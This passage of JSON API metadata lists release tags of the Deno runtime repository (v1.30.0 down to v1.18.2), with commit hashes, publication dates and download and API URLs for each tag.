s/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996